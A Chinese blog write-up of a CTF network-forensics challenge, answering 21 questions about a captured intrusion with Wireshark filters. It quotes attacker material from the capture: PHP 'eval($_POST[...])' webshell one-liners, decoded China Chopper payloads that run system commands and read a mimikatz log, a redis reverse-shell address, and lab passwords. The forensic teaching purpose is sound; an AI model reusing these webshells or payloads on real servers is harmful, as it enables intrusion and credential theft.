theKingOfNight's Blog

CTF-MISC-铁三数据赛

Word count: 2.4kReading time: 9 min
2019/01/19 Share

铁三的数据赛个人感觉出的非常好,比较适合我这样的新手,有兴趣的师傅们可以来玩一玩啊!
这里给大家共享一下

1
2
3
4
6.1比赛数据包
链接: https://pan.baidu.com/s/11-T-IeXRFRbdTrn5g96gXQ
密码: p5j8
解压密码:t3sec.org.cn


6.1比赛

1
2
题目给的信息大致就是黑客攻击了一台服务器,并以这个服务器为跳板扫描内网,继续攻击了一台内网主机
记不太清了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
题目问题
1.被攻击的两个服务器的内网ip分别是多少,以下简称服务器1和2(格式:空格分隔,按黑客攻击顺序排列)
2.两台服务器的主机名分别是什么
3.黑客使用了什么工具对服务器1进行的攻击(小写)
4.黑容成功登陆网站后台的账号密码以及验证码是什么(格式user/pass/vcode)
5.黑客向服务器1写入webshell的具体命令是什么(url解码后)
6.服务器1都开启了哪些允许外连的TCP注册端口(端口号从小到大,用空格间隔)
7.服务器1安装的修补程序名称
8.网站根目录的绝对路径(注意:大写,左斜杠,最后要有一个斜杠)
9.黑客使用什么命令或文件进行的内网扫描
10.扫描结果中服务器2开放了哪些端口(端口号从小到大,用空格隔开)
11.黑客执行的什么命令将administrator的密码保存到文件中
12.服务器1的系统管理员administrator的密码是什么
13.黑客进行内外扫描的ip范围(格式:xx.xx.xx.xx~xx.xx.xx.xx)
14.服务器1的mysql的root用户的密码是什么
15.黑客在服务器2中查看了哪个敏感文件(拿到shell之后),请写出绝对路径
16.服务器2的web网站后台账号密码(格式:账号/密码)
17.黑客在redis未授权访问中反弹shell的ip和端口是多少
18.黑客拿到root权限后执行的第二条命令是什么
19.服务器2的root用户密码是什么
20.黑客向服务器2写入webshell的命令
21.pcap中哪些ip发送过无偿ARP包(空格分隔,时间顺序排序)

1个G+的流量包,首先wareshark导出http特定分组.

1.被攻击的两个服务器的内网ip分别是多少,以下简称服务器1和2

1
然后用Omnipeek打开导出的http包,查看peerMap

peerMap1.png
直接就可以看到192.1681.74与202.1.1.2之间的颜色最亮,而且没有其他的线,很奇怪,所以初步判断这两个有问题,然后在导出第二个数据包,在继续看
peerMap2.png
仍然192.1681.74与202.1.1.2之间的颜色最亮,在打开第三个
peerMap3.png
第四个peerMap4.png
第5个peerMap5.png
第6个peerMap6.png
啊,可以很清楚的看到这三个主机很符合题意,并且比赛的时候一道题有5次提交机会,想错都难…..
不过看图也能发现是谁先与内网建立连接的,肯定就是那两个主机

1
2
第一题答案
192.168.1.74 192.168.2.66


1
2
3
4
5
接下来就只需要分析三个主机之间的故事就好 了
用wareshark导出这三个主机之间的故事
(ip.addr== 202.1.1.2 || ip.addr == 192.168.1.74||ip.addr == 192.168.2.66)
导出分组
剩下的就简单了,已经没有混淆流量了。

2.两台服务器的主机名分别是什么

说到主机名,考虑phpinfo,然后使用wareshark直接搜关键字

1
2
不知道还有没有其他的方法呢,欢迎小伙伴们补充
本菜不知道其他方法

找第一个主机的phpinfo

1
ip.addr== 192.168.1.74 && http contains "phpinfo"

然后追踪http流,保存文档为htmlhost1.png
同理,另外一台主机也有了(第2个和第六个)
host2.png

1
2
3
答案
TEST-7E28AF8836
cloude


3.黑客使用了什么工具对服务器1进行的攻击(小写)

这个太简答 了,直接看就好
sqlmap.png

1
2
答案
salmap


4.黑容成功登陆网站后台的账号密码以及验证码是什么(格式user/pass/vcode)

工具分析,黑客是在第二个数据包中拿到了1.74的权限,直接看攻击者干了什么

1
ip.addr== 202.1.1.2 && http.request.method == "POST"

login.png

1
2
答案
admin/adminlwphp/WD7x


5.黑客向服务器1写入webshell的具体命令是什么(url解码后)

直接看攻击者干了什么

1
ip.src == 202.1.1.2

一查就能看到敏感单词cmdcmd.png

1
2
3
url解码
13312 632.176257 202.1.1.2 192.168.1.74 HTTP 489 GET /tmpbjhbf.php?
cmd=echo ^<?php^ eval($_POST[ge]);?^>>abc.php HTTP/1.1

典型的中国菜刀一句话木马

1
2
答案
echo^<?php^ eval($_POST[ge]);?^>>abc.php


6.服务器1都开启了哪些允许外连的TCP注册端口(端口号从小到大,用空格间隔)

黑客已经拿中国菜刀连接上了,而且是windows电脑,所以会用到netstat指令
对指令进行过滤

1
ip.addr== 202.1.1.2 || ip.addr == 192.168.1.74 && http contains "abc"

可以看到聪明的黑客对指令进行了base64编码
逐条解密

1
2
3
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;
$m=get_magic_quotes_gpc();$f=$m?stripslashes($_POST["z1"]):$_POST["z1"];
echo(mkdir($f)?"1":"0");;echo("|<-");die();

直接查看端口port.png

1
2
3
答案
80135 139 445 1025 3306 3389
1025,3306,3389(可外连)


7.服务器1安装的修补程序名称

继续向下看黑客使用了哪些命令
隔一两条就能发现解码如下的东西

1
2
3
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();&z1=cmd&z2=cd /d "C:\WWW\"&systeminfo&echo [S]&cd&echo [E]

可以看到使用了systeminfo函数,查阅资料可以看到是有修补维护程序功能的pack.png

1
2
答案
Q147222


8.网站根目录的绝对路径(注意:大写,左斜杠,最后要有一个斜杠)

root.png
根据之前的也可以知道,直接就是那个

1
C:/www/


9.黑客使用什么命令或文件进行的内网扫描

这个题想到了比赛时候渗透那个题,学长还是厉害,给一个什么都没有的主机装了一大堆工具,然后扫描内网,爽歪歪….
不过扫描内网还是主机和第一个服务器发送大量请求,并且第一个服务器在扫描截断会发送大量的包,而且是在第三个数据包中才有另外一个主机.scan(导出相应的包后可以看到的Map).png

不过后来直接在浏览过程中发现了一个有意思的文件名scan.phpscan.png

1
2
答案
scan.php


10.扫描结果中服务器2开放了哪些端口(端口号从小到大,用空格隔开)

老套路

1
ip.addr== 202.1.1.2 || ip.addr == 192.168.1.74 && http contains "scan"

这里被自己坑了,找了半天没有找到,以后确定了ip就要回到原ip中重新导出相应ip的包,删除无效包切记切记

最后返回源文件中终于找到了相应ipport_3.png

1
2
密码
803306 6379


12.服务器1的系统管理员administrator的密码是什么

同样是在第三个数据包中,继续向下看
mimikz.png
追踪流,直接看到被改的密码change.png

1
2
Username : Administrator
Password : Simplexue123


11.黑客执行的什么命令将administrator的密码保存到文件中

继续在这附近找,最终解码如下change.png

1
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();&z1=C:\\WWW\\my\\mimi\\log.txt

答案

1
log.txt


13.黑客进行内外扫描的ip范围(格式:xx.xx.xx.xx~xx.xx.xx.xx)

前面找端口的时候可以直接看到ip范围

1
2
答案
192.168.1.1~192.168.3.255


14.服务器1的mysql的root用户的密码是什么

直接搜索关键字sql
然后在第四个包中就能找到db.png

1
2
3
4
5
答案
$mydbhost="localhost";
$mydbuser="root";
$mydbpw ="windpasssql";
$mydbname="510cms";

15.黑客在服务器2中查看了哪个敏感文件(拿到shell之后),请写出绝对路径catcat.png

1
2
答案
/etc/shadow

16.服务器2的web网站后台账号密码(格式:账号/密码)

直接搜关键字root 或者admin
在第六个包中可以找到pw.png

1
2
3
答案
admin/112233.com
root/7u8i9o0p


17.黑客在redis未授权访问中反弹shell的ip和端口是多少

前面顺便可以找到15

1
2
答案
202.1.1.2/6666


18.黑客拿到root权限后执行的第二条命令是什么

前面顺便可以找到

1
2
答案
cd/var/www/html


19.服务器2的root用户密码是什么

1
Simplexue123

emmmmmmm
这个考脑洞,自己体会


20.黑客向服务器2写入webshell的命令

也顺便可以找到

1
2
答案
`echo'<?php eval($_POST[a]);'>indexs.php`


21.pcap中哪些ip发送过无偿ARP包(空格分隔,时间顺序排序)

google一下就能知道无偿arp包与arp有关,同时无偿包有如下特点https://blog.csdn.net/chiyuwei1766/article/details/50717588.png
直接搜关键字

1
arp && arp.isgratuitous == true

然后在第1个和第4个里面可以找到
forth.png
first.png

1
2
3
4
答案
192.168.3.213
192.168.3.6
192.168.3.19

CATALOG
  1. 1. 6.1比赛
    1. 1.1. 1.被攻击的两个服务器的内网ip分别是多少,以下简称服务器1和2
    2. 1.2. 2.两台服务器的主机名分别是什么
    3. 1.3. 3.黑客使用了什么工具对服务器1进行的攻击(小写)
    4. 1.4. 4.黑容成功登陆网站后台的账号密码以及验证码是什么(格式user/pass/vcode)
    5. 1.5. 5.黑客向服务器1写入webshell的具体命令是什么(url解码后)
    6. 1.6. 6.服务器1都开启了哪些允许外连的TCP注册端口(端口号从小到大,用空格间隔)
    7. 1.7. 7.服务器1安装的修补程序名称
    8. 1.8. 8.网站根目录的绝对路径(注意:大写,左斜杠,最后要有一个斜杠)
    9. 1.9. 9.黑客使用什么命令或文件进行的内网扫描
    10. 1.10. 10.扫描结果中服务器2开放了哪些端口(端口号从小到大,用空格隔开)
    11. 1.11. 这里被自己坑了,找了半天没有找到,以后确定了ip就要回到原ip中重新导出相应ip的包,删除无效包切记切记
    12. 1.12. 12.服务器1的系统管理员administrator的密码是什么
    13. 1.13. 11.黑客执行的什么命令将administrator的密码保存到文件中
    14. 1.14. 13.黑客进行内外扫描的ip范围(格式:xx.xx.xx.xx~xx.xx.xx.xx)
    15. 1.15. 14.服务器1的mysql的root用户的密码是什么
    16. 1.16. 15.黑客在服务器2中查看了哪个敏感文件(拿到shell之后),请写出绝对路径
    17. 1.17. 16.服务器2的web网站后台账号密码(格式:账号/密码)
    18. 1.18. 17.黑客在redis未授权访问中反弹shell的ip和端口是多少
    19. 1.19. 18.黑客拿到root权限后执行的第二条命令是什么
    20. 1.20. 19.服务器2的root用户密码是什么
    21. 1.21. 20.黑客向服务器2写入webshell的命令
    22. 1.22. 21.pcap中哪些ip发送过无偿ARP包(空格分隔,时间顺序排序)